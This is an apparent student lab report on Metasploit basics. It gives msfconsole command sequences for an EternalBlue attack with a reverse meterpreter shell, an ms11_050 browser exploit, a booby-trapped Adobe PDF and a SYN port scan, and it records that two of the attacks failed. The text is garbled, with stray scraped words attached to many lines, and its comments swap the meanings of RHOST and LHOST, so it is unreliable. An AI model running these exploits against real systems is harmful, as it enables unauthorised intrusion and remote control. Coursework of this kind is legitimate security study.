2018-2019 20165219 網絡對抗 Exp5 MSF基礎

實驗內容

本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:html

1.1一個主動攻擊實踐,如ms08_067; (1分)windows

1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)瀏覽器

1.3 一個針對客戶端的攻擊,如Adobe;(1分)tcp

1.4 成功應用任何一個輔助模塊。(0.5分)編碼

以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。線程

基礎知識問答

用本身的話解釋什麼是exploit,payload,encode.code

用本身感受通俗的話來講:orm

exploit:滲透攻擊,利用發現的漏洞對靶機進行攻擊。htm

payload:攻擊載荷,滲透攻擊成功後在系統中運行的模塊,即經過滲透攻擊把攻擊載荷運至靶機中。blog

Ecode:編碼器,對代碼進行異或、祛除壞字符及其餘編碼,保護攻擊載荷不被發現。

實踐過程
主動攻擊實踐

ms17_010
攻擊機 靶機ping通

輸入msfconsole指令,打開控制檯

use exploit/windows/smb/ms17_010_eternalblue    //使用漏洞

set payload windows/x64/meterpreter/reverse_tcp   //選擇攻擊載荷

set RHOST   //設置攻擊方ip

set LHOST   //設置靶機ip

exploit

針對瀏覽器的攻擊

ms11_050

輸入msfconsole指令,打開控制檯

msf > use windows/browser/ms11_050_mshtml_cobjectelement   //使用瀏覽器ms11_050漏洞
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http      //使用http反向回連
msf exploit(ms11_050_cobjectelement) > set LHOST //攻擊方ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5219 //攻擊方攻擊端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5219wyb //統一資源標識符路徑設置

show options

exploit攻擊之後,將生成的網址在靶機中打開,網頁打開失敗,瀏覽器中止工做,攻擊失敗

針對客戶端的攻擊

Adobe

輸入msfconsole指令,打開控制檯

use windows/fileformat/adobe_cooltype_sing     //選擇攻擊模塊
set payload windows/meterpreter/reverse_tcp     //設置tcp反向鏈接
set LHOST  //攻擊方IP
set LPORT 5219   //攻擊方攻擊端口
set FILENAME 20165219exp5.pdf         //生成的文件名

獲得文件路徑

找到文件並複製到靶機

由於我沒有裝xp虛擬機,w7不能打開

成功應用任何一個輔助模塊

use auxiliary/scanner/portscan/syn(使用portscan模塊)

show options

set RHOST 192.168.183.129(目標)

set THREADS 50(線程)

exploit

實驗中遇到的問題及解決方法

Adobe實驗中 沒有找到生成的pdf文件

解決: 根據生成的路徑,在終端cd進入文件所在目錄,再用複製命令移動到主文件夾下

沒有安裝xp虛擬機

解決:此次時間不太夠了emmm 下次補上

離實戰還缺什麼步驟

多去嘗試新的攻擊手法,能夠去找一些其餘的攻擊模塊嘗試

實驗感想

學會了利用MSF進行多種方式的滲透,可是感受本身對MSF的瞭解仍是欠缺的,對於指令,並無理解,只是單純的照搬,之後還需努力

相關文章
相關標籤/搜索